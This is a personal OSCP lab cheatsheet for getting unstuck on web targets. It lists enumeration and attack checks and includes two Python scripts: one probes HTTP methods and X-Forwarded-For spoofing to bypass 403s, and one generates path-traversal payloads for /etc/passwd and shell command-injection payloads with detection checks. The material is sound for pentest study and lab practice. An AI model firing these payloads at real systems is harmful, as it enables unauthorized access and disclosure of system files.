My little cheatsheet

https://www.blakejarvis.com/oscp/oscp-things-to-try-when-stuck

Run all the enumeration you can:

Enumerate directories with FeroxBuster and Dirsearch, and add the box name to the wordlist (for example /shenzi/ on the box shenzi).

Enumerate for CGI scripts (usually under /cgi-bin/) and test every one of them for Shellshock, not just the first one you find.

Run nikto.

Examine the page source and any JavaScript for API endpoints you could call directly.

Use curl and Burp Suite to change the request method (GET, POST, PUT, OPTIONS, ...) and look for any unusual response.

If the site answers 404 or 403, check whether the block is IP-based and try to bypass it (for example by spoofing a local address through proxy headers such as X-Forwarded-For).
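The two checks above (alternate request methods, and a 403/404 that may be IP-gated) can be scripted. The block below is an added example, not code from this cheatsheet or from any tool it names: probe_methods sends every common method to one URL and returns the status each one got, and probe_bypass retries a 403/404 URL with a handful of proxy/client-IP headers set to 127.0.0.1 and reports which ones flip it to a 2xx. The header list is an assumption (common candidates, not an exhaustive or authoritative set), and the _MockHandler server at the bottom is a constructed stand-in so the probes can run offline; point the functions at a real URL to use them on a target.

```python
"""Probe one URL with alternate HTTP methods and IP-spoofing headers.

Added example for this cheatsheet; not code from the page or from the
tools it names. Assumes a plain HTTP target. The mock server at the
bottom is constructed so the probes can be exercised offline, and the
header list is a set of common candidates, not an exhaustive one.
"""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse

METHODS = ["GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS", "PATCH", "TRACE"]

# Headers a misconfigured reverse proxy or IP allow-list may trust (assumed list).
BYPASS_HEADERS = [
    {"X-Forwarded-For": "127.0.0.1"},
    {"X-Real-IP": "127.0.0.1"},
    {"X-Originating-IP": "127.0.0.1"},
    {"X-Client-IP": "127.0.0.1"},
    {"X-Remote-Addr": "127.0.0.1"},
]


def request(url, method="GET", headers=None, timeout=5):
    """Send one request and return (status, body); redirects are not followed."""
    u = urlparse(url)
    path = (u.path or "/") + ("?" + u.query if u.query else "")
    conn = http.client.HTTPConnection(u.hostname, u.port or 80, timeout=timeout)
    try:
        conn.request(method, path, headers=headers or {})
        resp = conn.getresponse()
        return resp.status, resp.read()
    finally:
        conn.close()


def probe_methods(url):
    """Map every method in METHODS to the status it gets. A method that
    answers differently from GET (PUT -> 201, OPTIONS -> 200) is the
    unusual response worth chasing."""
    return {m: request(url, m)[0] for m in METHODS}


def probe_bypass(url):
    """Return (baseline_status, [(headers, status), ...]) listing header sets
    that turn a 403/404 baseline into a 2xx."""
    baseline = request(url)[0]
    hits = []
    for hdrs in BYPASS_HEADERS:
        status, _ = request(url, "GET", hdrs)
        if status != baseline and 200 <= status < 300:
            hits.append((hdrs, status))
    return baseline, hits


# ---- constructed mock target, only so the probes can run offline ----------
class _MockHandler(BaseHTTPRequestHandler):
    """/admin is 403 unless X-Forwarded-For says 127.0.0.1 (a proxy that
    trusts the client-supplied address); /upload accepts PUT (201) and
    OPTIONS (200) but rejects every other method (405)."""

    def _send(self, code, body=b"", extra=None):
        self.send_response(code)
        self.send_header("Content-Length", str(len(body)))
        for k, v in (extra or {}).items():
            self.send_header(k, v)
        self.end_headers()
        if self.command != "HEAD":
            self.wfile.write(body)

    def _handle(self):
        if self.path.startswith("/admin"):
            if self.headers.get("X-Forwarded-For") == "127.0.0.1":
                return self._send(200, b"admin panel")
            return self._send(403, b"forbidden")
        if self.path.startswith("/upload"):
            if self.command == "PUT":
                return self._send(201, b"stored")
            if self.command == "OPTIONS":
                return self._send(200, extra={"Allow": "PUT, OPTIONS"})
            return self._send(405, b"method not allowed")
        if self.command in ("GET", "HEAD"):
            return self._send(200, b"index")
        self._send(405, b"method not allowed")

    do_GET = do_HEAD = do_POST = do_PUT = do_DELETE = _handle
    do_OPTIONS = do_PATCH = do_TRACE = _handle

    def log_message(self, *args):  # keep the demo output quiet
        pass


def start_mock():
    """Start the mock on an ephemeral port; returns (server, base_url)."""
    srv = HTTPServer(("127.0.0.1", 0), _MockHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d" % srv.server_address[1]


if __name__ == "__main__":
    srv, base = start_mock()
    print("methods on /upload:", probe_methods(base + "/upload"))
    print("bypass on /admin:", probe_bypass(base + "/admin"))
    srv.shutdown()
```

Any method that answers differently from GET (a PUT that returns 201, an OPTIONS whose Allow header lists methods the site never advertises) is the unusual response to dig into; a header that flips 403 to 200 means the access control trusts a client-supplied address and the block can be bypassed from anywhere.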

If you can identify a CMS, look it up in searchsploit and identify its vulnerabilities.

If you don't know the version but know that exploits exist, run them all.

If you can't identify a CMS, the application is probably custom-built, which in a lab usually means it was made exploitable on purpose.

That means there are several things to check:

Check for SQL injection (go straight to the SQL injection section of this blog); depending on the database and its version, check whether it lets you run commands or write files to get a shell (for example xp_cmdshell on MSSQL or INTO OUTFILE on MySQL).

If the application runs WebDAV, look for credentials and try the default ones.

If you come across Tomcat, look for manager credentials so you can upload a WAR file.

If a parameter references a file, check for RFI and LFI; kadimus and LFISuite automate the LFI checks.

Check cookies and other parameters for values you can change to elevate privileges.

If the website is a proxy, check whether you can pivot through it with spose.

If there is a WordPress site, check for credentials.

Check for Node.js RCE.

Check for parameters that could be used for command injection, as on hetemit.
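For the file-parameter (LFI) and command-injection checks above, the following added example (not the cheatsheet's own code, and unrelated to kadimus or LFISuite) generates the payloads and checks the responses. lfi_payloads emits traversal variants for a target file and looks_like_file_read recognises /etc/passwd records or win.ini sections in a response body; cmdi_payloads injects an echo of a marker split in two with '' so a page that merely reflects the input cannot false-positive, and find_executing_payload picks the payload whose marker came back joined. It assumes you send each payload in the suspect parameter yourself (URL-encoded; the newline separator has to go out as %0a) and hand the response body back; the sample bodies in the __main__ block are constructed, not captured from a target.

```python
"""Payload generation and response checks for LFI and OS command injection.

Added example for this cheatsheet; not code from the page, kadimus or
LFISuite. Assumes a GET/POST parameter whose value reaches a file include
or a shell command. The caller sends each payload (URL-encoded; the "\\n"
separator goes out as %0a) and hands the response body back.
"""
import re
import secrets


def lfi_payloads(target="etc/passwd", max_depth=8):
    """Yield traversal variants for one target: plain, '/'-encoded, a
    doubled form that survives a single '../' strip, a trailing null byte
    (old PHP truncates there), an absolute path, and php://filter, which
    returns PHP source base64-encoded instead of executing it."""
    for depth in range(1, max_depth + 1):
        trav = "../" * depth
        yield trav + target
        yield trav.replace("../", "..%2f") + target
        yield trav.replace("../", "....//") + target
        yield trav + target + "%00"
    yield "/" + target
    yield "php://filter/convert.base64-encode/resource=" + target


# A complete /etc/passwd record (seven colon-separated fields) or a win.ini section.
PASSWD_LINE = re.compile(
    r"^[A-Za-z_][\w-]*:[^:\n]*:\d+:\d+:[^:\n]*:[^:\n]*:[^\n]*$", re.M)
WIN_INI = re.compile(r"^\[(fonts|extensions|mci extensions|files)\]", re.M | re.I)


def looks_like_file_read(body):
    """True when the body carries a passwd record or a win.ini section."""
    return bool(PASSWD_LINE.search(body) or WIN_INI.search(body))


# Separators that end the original command, plus inline substitution forms.
SEPARATORS = [";", "|", "||", "&&", "\n", "`{cmd}`", "$({cmd})"]


def cmdi_payloads(base_value="127.0.0.1"):
    """Return (payload, marker) pairs. The marker is echoed as two halves
    joined by '' so the joined string appears only if a shell ran echo;
    a page that merely reflects the input shows the halves with the quotes."""
    a, b = secrets.token_hex(3), secrets.token_hex(3)
    cmd = "echo %s''%s" % (a, b)
    marker = a + b
    pairs = []
    for sep in SEPARATORS:
        inj = sep.format(cmd=cmd) if "{cmd}" in sep else sep + cmd
        pairs.append((base_value + inj, marker))
        # The same injection after closing a quoted context such as '<input>'.
        pairs.append((base_value + "'" + inj + " #", marker))
    return pairs


def find_executing_payload(pairs, responses):
    """pairs from cmdi_payloads; responses maps payload -> body. Returns the
    first payload whose joined marker came back, or None if nothing executed."""
    for payload, marker in pairs:
        if marker in responses.get(payload, ""):
            return payload
    return None


if __name__ == "__main__":
    # Constructed responses, not captured from a target.
    print(list(lfi_payloads("etc/passwd", max_depth=2)))
    print(looks_like_file_read("root:x:0:0:root:/root:/bin/bash\n"))
    pairs = cmdi_payloads("10.0.0.5")
    responses = {p: "you entered: " + p for p, _ in pairs}   # pure reflection
    print(find_executing_payload(pairs, responses))
    payload, marker = pairs[2]
    responses[payload] = "PING 10.0.0.5\n" + marker + "\n"   # echo actually ran
    print(find_executing_payload(pairs, responses) == payload)
```

The split marker is the important detail: a naive check for "echo ran" that searches for the same string you sent will light up on any page that echoes the parameter back, which is exactly the kind of false positive that wastes time when you are stuck.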

If there is a login page, see the login-page section.
